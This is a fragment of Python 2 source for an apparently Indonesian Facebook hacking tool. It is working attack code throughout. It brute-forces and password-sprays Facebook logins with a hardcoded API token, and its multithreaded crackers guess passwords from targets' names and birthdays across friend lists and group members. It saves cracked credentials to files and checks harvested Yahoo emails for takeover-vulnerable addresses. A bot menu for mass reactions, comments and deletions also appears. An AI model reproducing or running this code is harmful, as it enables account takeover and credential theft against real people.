data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz5
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz5
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
pz6 = "kontol123"
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz6
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz6
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
pz7 = "sayang123"
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz7
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz6
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
print "\033[1;91m[!] Sorry, failed to open the target password :("
print "\033[1;91m[!] try it another way."
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
except KeyError:
print "\033[1;91m[!] Terget not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
##### Multi Brute Force #####
##### CRACK ####
def crack():
global idlist,passw,file
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
idlist = raw_input('\033[1;91m[+] \033[1;92mFile ID \033[1;91m: \033[1;97m')
passw = raw_input('\033[1;91m[+] \033[1;92mPassword \033[1;91m: \033[1;97m')
try:
file = open((idlist), "r")
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
for x in range(40):
zedd = threading.Thread(target=scrak, args=())
zedd.start()
threads.append(zedd)
for zedd in threads:
zedd.join()
except IOError:
print ("\033[1;91m[!] File not found")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
def scrak():
global berhasil,cekpoint,gagal,back,up
try:
os.mkdir('out')
except OSError:
pass
try:
buka = open(idlist, "r")
up = buka.read().split()
while file:
username = file.readline().strip()
url = "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(username)+"&locale=en_US&password="+(passw)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
data = urllib.urlopen(url)
mpsh = json.load(data)
if back == (len(up)):
break
if 'access_token' in mpsh:
bisa = open("out/mbf_ok.txt", "w")
bisa.write(username+"|"+passw+"\n")
bisa.close()
x = requests.get("https://graph.facebook.com/"+username+"?access_token="+mpsh['access_token'])
z = json.loads(x.text)
berhasil.append("\033[1;97m[ \033[1;92mOK✓\033[1;97m ] "+username+"|" +passw+" =>"+z['name'])
elif 'www.facebook.com' in mpsh["error_msg"]:
cek = open("out/mbf_cp.txt", "w")
cek.write(username+"|"+passw+"\n")
cek.close()
cekpoint.append("\033[1;97m[ \033[1;93mCP✚\033[1;97m ] "+username+"|" +passw)
else:
gagal.append(username)
back +=1
sys.stdout.write('\r\033[1;91m[\033[1;96m✸\033[1;91m] \033[1;92mCrack \033[1;91m:\033[1;97m '+str(back)+' \033[1;96m>\033[1;97m '+str(len(up))+' =>\033[1;92mLive\033[1;91m:\033[1;96m'+str(len(berhasil))+' \033[1;97m=>\033[1;93mCheck\033[1;91m:\033[1;96m'+str(len(cekpoint)));sys.stdout.flush()
except IOError:
print"\n\033[1;91m[!] Sleep"
time.sleep(1)
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
def hasil():
print
print 42*"\033[1;97m═"
###Berhasil
for b in berhasil:
print(b)
###CEK
for c in cekpoint:
print(c)
###Gagal
print 42*"\033[1;97m═"
print ("\033[31m[x] Failed \033[1;97m--> " + str(len(gagal)))
keluar()
############### SUPER MBF ################
def super():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;95m║--\033[1;91m> \033[1;96m1.\033[1;93m Crack with list friend"
print "\033[1;95m║--\033[1;91m> \033[1;96m2.\033[1;93m Crack from friend"
print "\033[1;95m║--\033[1;91m> \033[1;96m3.\033[1;93m Crack from member group"
print "\033[1;95m║--\033[1;91m> \033[1;96m0.\033[1;93m Back"
print "║"
pilih_super()
def pilih_super():
peak = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if peak =="":
print "\033[1;91m[!] Wrong input"
pilih_super()
elif peak =="1":
os.system('reset')
print logo
jalan('\033[1;94m[✺] \033[1;96mGet all friend id \033[1;95m...')
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif peak =="2":
os.system('reset')
print logo
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
super()
jalan('\033[1;91m[✺] \033[1;92mGet all id from friend \033[1;97m...')
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif peak =="3":
os.system('reset')
print logo
idg=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+idg+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
super()
jalan('\033[1;91m[✺] \033[1;92mGet group member id \033[1;97m...')
re=requests.get('https://graph.facebook.com/'+idg+'/members?fields=name,id&limit=999999999&access_token='+toket)
s=json.loads(re.text)
for p in s['data']:
id.append(p['id'])
elif peak =="0":
menu_hack()
else:
print "\033[1;91m[!] Wrong input"
pilih_super()
print "\033[1;91m[+] \033[1;92mTotal ID \033[1;91m: \033[1;97m"+str(len(id))
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;91m[\033[1;96m✸\033[1;91m] \033[1;92mCrack \033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
print
print 42*"\033[1;97m═"
##### crack #####
def main(arg):
global cekpoint,oks
user = arg
try:
os.mkdir('out')
except OSError:
pass
try:
#Pass1
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass1 = b['first_name']+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass1+" =>"+z['name'])
oks.append(user+pass1)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass1+"\n")
cek.close()
cekpoint.append(user+pass1)
else:
#Pass2
pass2 = b['first_name']+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass2+" =>"+z['name'])
oks.append(user+pass2)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass2+"\n")
cek.close()
cekpoint.append(user+pass2)
else:
#Pass3
pass3 = b['last_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass3+" =>"+z['name'])
oks.append(user+pass3)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass3+"\n")
cek.close()
cekpoint.append(user+pass3)
else:
#Pass4
lahir = b['birthday']
pass4 = lahir.replace('/', '')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass4+" =>"+z['name'])
oks.append(user+pass4)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass4+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
#Pass5
pass5 = "sayang123"
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass5+" =>"+z['name'])
oks.append(user+pass5)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass5+"\n")
cek.close()
cekpoint.append(user+pass5)
else:
#Pass6
pass6 = "kontol123"
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass6+" =>"+z['name'])
oks.append(user+pass6)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass6+"\n")
cek.close()
cekpoint.append(user+pass6)
else:
#Pass7
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass7 = b['first_name']+'doraemon321'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass7+" =>"+z['name'])
oks.append(user+pass7)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass7+"\n")
cek.close()
cekpoint.append(user+pass7)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal OK/CP \033[1;91m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;93m"+str(len(cekpoint))
print("\033[1;91m[+] \033[1;92mCP File saved \033[1;91m: \033[1;97mout/super_cp.txt")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
super()
######################################################
##### BRUTE FORCE #####
def brute():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
try:
email = raw_input("\033[1;91m[+] \033[1;92mID\033[1;97m/\033[1;92mEmail\033[1;97m/\033[1;92mHp \033[1;97mTarget \033[1;91m:\033[1;97m ")
passw = raw_input("\033[1;91m[+] \033[1;92mWordlist \033[1;97mext(list.txt) \033[1;91m: \033[1;97m")
total = open(passw,"r")
total = total.readlines()
print 42*"\033[1;97m═"
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mTarget \033[1;91m:\033[1;97m "+email
print "\033[1;91m[+] \033[1;92mTotal\033[1;96m "+str(len(total))+" \033[1;92mPassword"
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
sandi = open(passw,"r")
for pw in sandi:
try:
pw = pw.replace("\n","")
sys.stdout.write("\r\033[1;91m[\033[1;96m✸\033[1;91m] \033[1;92mCrack \033[1;91m: \033[1;97m"+pw)
sys.stdout.flush()
data = requests.get("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(email)+"&locale=en_US&password="+(pw)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
dapat = open("Brute.txt", "w")
dapat.write(email+" | "+pw+"\n")
dapat.close()
print "\n\033[1;91m[+] \033[1;92mFound"
print 42*"\033[1;97m═"
print("\033[1;91m[➹] \033[1;92mUsername \033[1;91m:\033[1;97m "+email)
print("\033[1;91m[➹] \033[1;92mPassword \033[1;91m:\033[1;97m "+pw)
keluar()
elif 'www.facebook.com' in mpsh["error_msg"]:
ceks = open("Brutecekpoint.txt", "w")
ceks.write(email+" | "+pw+"\n")
ceks.close()
print "\n\033[1;91m[+] \033[1;92mFound"
print 42*"\033[1;97m═"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print("\033[1;91m[➹] \033[1;92mUsername \033[1;91m:\033[1;97m "+email)
print("\033[1;91m[➹] \033[1;92mPassword \033[1;91m:\033[1;97m "+pw)
keluar()
except requests.exceptions.ConnectionError:
print"\033[1;91m[!] Connection Error"
time.sleep(1)
except IOError:
print ("\033[1;91m[!] File not found")
tanyaw()
def tanyaw():
why = raw_input("\033[1;91m[?] \033[1;92mCreate wordlist ? \033[1;92m[y/n]\033[1;91m:\033[1;97m ")
if why =="":
print "\033[1;91m[!] Wrong"
tanyaw()
elif why =="y":
wordlist()
elif why =="Y":
wordlist()
elif why =="n":
menu_hack()
elif why =="N":
menu_hack()
else:
print "\033[1;91m[!] Wrong"
tanyaw()
##### YAHOO CHECKER #####
#---------------------------------------------------#
def menu_yahoo():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m With list friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Clone from friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m3.\033[1;97m Clone from member group"
print "\033[1;97m║--\033[1;91m> \033[1;92m4.\033[1;97m Using file"
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
yahoo_pilih()
#----pilih
def yahoo_pilih():
go = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if go =="":
print "\033[1;91m[!] Wrong"
yahoo_pilih()
elif go =="1":
yahoofriends()
elif go =="2":
yahoofromfriends()
elif go =="3":
yahoomember()
elif go =="4":
yahoolist()
elif go =="0":
menu_hack()
else:
print "\033[1;91m[!] Wrong"
yahoo_pilih()
##### LIST FRIEND #####
def yahoofriends():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
mpsh = []
jml = 0
jalan('\033[1;91m[✺] \033[1;92mGetting email friend \033[1;97m...')
teman = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
kimak = json.loads(teman.text)
save = open('out/MailVuln.txt','w')
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print("\033[1;97m[ \033[1;92mVULN✓\033[1;97m ] \033[1;92m" +mail+" \033[1;97m=>"+nama)
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;91m[+] \033[1;92mFile saved \033[1;91m:\033[1;97m out/MailVuln.txt"
save.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
##### CLONE FROM FRIEND #####
def yahoofromfriends():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
mpsh = []
jml = 0
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
jalan('\033[1;91m[✺] \033[1;92mGetting email from friend \033[1;97m...')
teman = requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+toket)
kimak = json.loads(teman.text)
save = open('out/FriendMailVuln.txt','w')
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print("\033[1;97m[ \033[1;92mVULN✓\033[1;97m ] \033[1;92m" +mail+" \033[1;97m=>"+nama)
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;91m[+] \033[1;92mFile saved \033[1;91m:\033[1;97m out/FriendMailVuln.txt"
save.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
##### YAHOO MEMBER #####
def yahoomember():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
mpsh = []
jml = 0
id=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
jalan('\033[1;91m[✺] \033[1;92mGetting email from group \033[1;97m...')
teman = requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
kimak = json.loads(teman.text)
save = open('out/GrupMailVuln.txt','w')
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print("\033[1;97m[ \033[1;92mVULN✓\033[1;97m ] \033[1;92m" +mail+" \033[1;97m=>"+nama)
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;91m[+] \033[1;92mFile saved \033[1;91m:\033[1;97m out/GrupMailVuln.txt"
save.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
##### YAHOO FILE #####
def yahoolist():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
files = raw_input("\033[1;91m[+] \033[1;92mFile path \033[1;91m: \033[1;97m")
try:
total = open(files,"r")
mail = total.readlines()
except IOError:
print"\033[1;91m[!] File not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
mpsh = []
jml = 0
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
save = open('out/FileMailVuln.txt','w')
print 42*"\033[1;97m═"
mail = open(files,"r").readlines()
for pw in mail:
mail = pw.replace("\n","")
jml +=1
mpsh.append(jml)
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print("\033[1;97m[ \033[1;92mVULN✓\033[1;97m ] \033[1;92m" +mail)
berhasil.append(mail)
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;91m[+] \033[1;92mFile saved \033[1;91m:\033[1;97m out/FileMailVuln.txt"
save.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
##### MENU BOT #####
#----------------------------------------#
def menu_bot():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m Bot Reactions Target Post"
print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Bot Reactions Grup Post"
print "\033[1;97m║--\033[1;91m> \033[1;92m3.\033[1;97m Bot Komen Target Post"
print "\033[1;97m║--\033[1;91m> \033[1;92m4.\033[1;97m Bot Komen Grup Post"
print "\033[1;97m║--\033[1;91m> \033[1;92m5.\033[1;97m Mass delete Post"
print "\033[1;97m║--\033[1;91m> \033[1;92m6.\033[1;97m Mass accept friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m7.\033[1;97m Mass delete friend"
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
bot_pilih()
#////////////
def bot_pilih():
bots = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if bots =="":
print "\033[1;91m[!] Wrong input"
bot_pilih()
elif bots =="1":
menu_react()
elif bots =="2":
grup_react()
elif bots =="3":
bot_komen()
elif bots =="4":
grup_komen()
elif bots =="5":
deletepost()
elif bots =="6":
accept()
elif bots =="7":
unfriend()
elif bots =="0":
menu()
else:
print "\033[1;91m[!] Wrong input"
bot_pilih()
##### MENU REACT #####
def menu_react():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
